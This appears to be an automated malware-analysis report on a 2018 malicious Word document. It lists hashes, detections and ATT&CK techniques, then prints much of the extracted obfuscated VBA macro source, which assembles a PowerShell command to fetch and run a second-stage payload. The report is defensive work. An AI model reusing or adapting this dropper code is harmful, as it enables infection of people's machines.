Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0e99c26de560c4ec…

MALICIOUS

Office (OLE)

Size: 97.5 KB
Created: 2018-06-20 16:58:00
Authoring application: Microsoft Office Word
First seen: 2018-07-18
MD5: 0d6da12f4fceb53d3f8981ba240444b6
SHA-1: 6b4c6960f465b05147ab1c725a57d14c12b314e8
SHA-256: 0e99c26de560c4ec633ca9287d3a92a08bc16bce0b330f4d7f2f31d28cc8fa02
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro executes a Shell() call, which is used to construct and run a PowerShell command. This command appears to be designed to download and execute a second-stage payload from a heavily obfuscated string. The ClamAV detection further confirms its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6585018-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6585018-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11484 bytes
SHA-256: 501cdf5c7c991ccd04b633a56757deec924f9d2d91f13470cd088b6e90cce831

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "IFXRNqtz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "LbwcJFwT"
Function EDaTqlzhW()
On Error Resume Next
lzSDjT = CDate(dklACN + Sin(21671 + 51402) * 79117 * CInt(93264))
jkGKN = KSfOLj
kuiEC = 9589
Hirrw = CByte(qrXnu)
hiOTZ = 79677
NCDrw = CDate(42789)
EaiJk = "Ower" + "SHell &( $" + "pSHom" + "e[21" + "]+$psHOmE[30]+" + "'x')( " + Chr(34) + "$(SEt-iTEM " + " '" + "VaRIAbLe:OF" + "s'  "
zrAzQ = CDate(IWjEH + Sin(29613 + 48149) * 72560 * CInt(59865))
wZWRwh = oImwkv
KYOaGG = 43186
jAnNHj = CByte(lhalj)
CXDQh = 17164
OnTRDi = CDate(36691)
NbjVt = "'')" + Chr(34) + " " + "+[STRING]( '11" + "@97," + "122w95w64s" + "123L85@1" + "5L18e15A65A7"
IDWpl = CDate(pJjjWK + Sin(84016 + 35851) * 38305 * CInt(54364))
pYKBt = KZWLc
NqjHPA = 42815
RTcIsS = CByte(MBXRwM)
ocUtFL = 47120
iEXbYB = CDate(69809)
abwwNVowQYR = "4M" + "88,2A64" + "L77,6" + "9@74e76L91M15"
QmGvq = CDate(IdnKCf + Sin(64870 + 44148) * 45162 * CInt(642))
oQuqUv = kanSXJ
DhvXrq = 70821
CzLkvY = CByte(dZKOnM)
wjamM = 9322
OXNas = CDate(8968)
luiYSALFAW = "e9" + "3w78G65L" + "75@64G66L" + "20s11@105k1" + "06" + "L96A69M67@76s1" + "5,18@15," + "65k74"
zHkKv = CDate(jrUqh + Sin(91473 + 69786) * 53849 * CInt(91526))
bAofVV = pVvip
FYZAmz = 24329
isrXV = CByte(cKLwrJ)
kvIGI = 18445
QLpFd = CDate(86813)
brwzkplvHz = "G88L2A64A" + "77e69e74s76" + "G91k15" + "e12" + "4@86,9" + "2G91L7" + "4e66" + "s1s97@"
svpAZt = CDate(58757)
uYpbSY = CDate(vZXdkj + Sin(87061 + 52093) * 48675 * CInt(41342))
HjbRC = 71434
VOvZiU = CByte(NEoNi)
GFapG = 95927
UvWqUt = jdMqbs
litMEjsVp = "74M91@1w12" + "0e74G77@108G6" + "7,70,74M" + "65A91G20" + "M11M92w120@"
muaFw = CDate(58732)
iaSlS = CDate(iZSEL + Sin(5209 + 18238) * 55583 * CInt(67434))
vdRfR = 68586
zzTQii = CByte(iNDEw)
MhnOT = 43036
sawOjX = WlKwiA
iGkUbcP = "106L90k78" + "@15" + "s18,15A8M71A91," + "91L95s21L0k0w" + "75w64s67,90k" + "64,65s72w71G7" + "0s74e90G94A" + "90" + "@7"
HaAYPr = CDate(57153)
uJMzJ = CDate(oPkHhd + Sin(68581 + 46356) * 46861 * CInt(52339))
izHzzQ = 18014
BmYDQh = CByte(BQlGjv)
RPmrO = 81450
VhfWdN = ljpjwb
ERbhoW = "8A1,76w64,66M0" + "e122A12" + "5@103w75" + "k122A1" + "24k127e123@85A2" + "2s0A111L71G" + "91k"
EDaTqlzhW = EaiJk + NbjVt + abwwNVowQYR + luiYSALFAW + brwzkplvHz + litMEjsVp + iGkUbcP + ERbhoW
End Function
Function iwTjjPcLoSw()
On Error Resume Next
LamIQ = CDate(17565)
QOzjJ = CDate(QzfSVc + Sin(28970 + 70851) * 37046 * CInt(36441))
XCNAB = 96752
RQjCZ = CByte(uJwsRw)
PEksrl = 5914
dZmGH = taSQH
LcCiA = "91e95w21w0" + "@0s9" + "2," + "86A65A74w93L7" + "2L86@76L" + "78G95e70k"
GqUJA = CDate(30150)
lkXzQ = CDate(CkkOJ + Sin(56258 + 71856) * 43465 * CInt(70433))
DtoXz = 58497
WpjpsI = CByte(irWAIz)
UOwOR = 71473
bOojas = qcFOz
wLFZibk = "91" + "A78@67M1k69L9" + "5@0s" + "95k103A101" + "G126,103,127s2" + "5@0A111k" + "71w9"
sOhWLm = CDate(10271)
QAMOTl = CDate(clmhEj + Sin(73306 + 26909) * 97132 * CInt(95491))
JpcHi = 88061
HrfMh = CByte(EtuLj)
YLqHf = 32371
jbzaUl = isqbTR
ZLsTkwr = "1w91" + "M95w" + "21e0,0e88M88@8" + "8G1k66L74@64" + "A71" + "A78A86A7" + "7@64e91"
psoARV = CDate(22475)
UvGSjz = CDate(kVSNHG + Sin(43994 + 72852) * 81784 * CInt(85924))
wqcHHi = 53391
GAiYS = CByte(dkpfa)
mSvmKt = 31197
wQvaAc = kDDCb
KRlIaBGzfF = "e90w70k1M7" + "6M64e66w0,94G1" + "02e91" + "G69" + "k104k102@0k1"
wwhiu = CDate(54839)
oKkbwc = CDate(jvCLd + Sin(18823 + 72631) * 20120 * CInt(71064))
SUsPXS = 37205
SHzIW = CByte(vkuvi)
VuriP = 65425
ESTQXK = PPCvWm
bVYipwkDvDU = "11k7" + "1M91L91M" + "95L21e0M0@70" + "s95k71s64L65s74" + "G92A1s77s70" + "s7" + "5e0e10"
hZHJI = CDate(84566)
iSHvCQ = CDate(nAaXc + Sin(16763 + 94315) * 89875 * CInt(51329))
BfTqzi = 67823
UblLl = CByte(bIKRzs)
jqqtj = 4813
LBjul = MPpTTF
srDrrR = "1M72,105" + "e124L" + "92" + "s89@75,28k" + "0s111
... (truncated)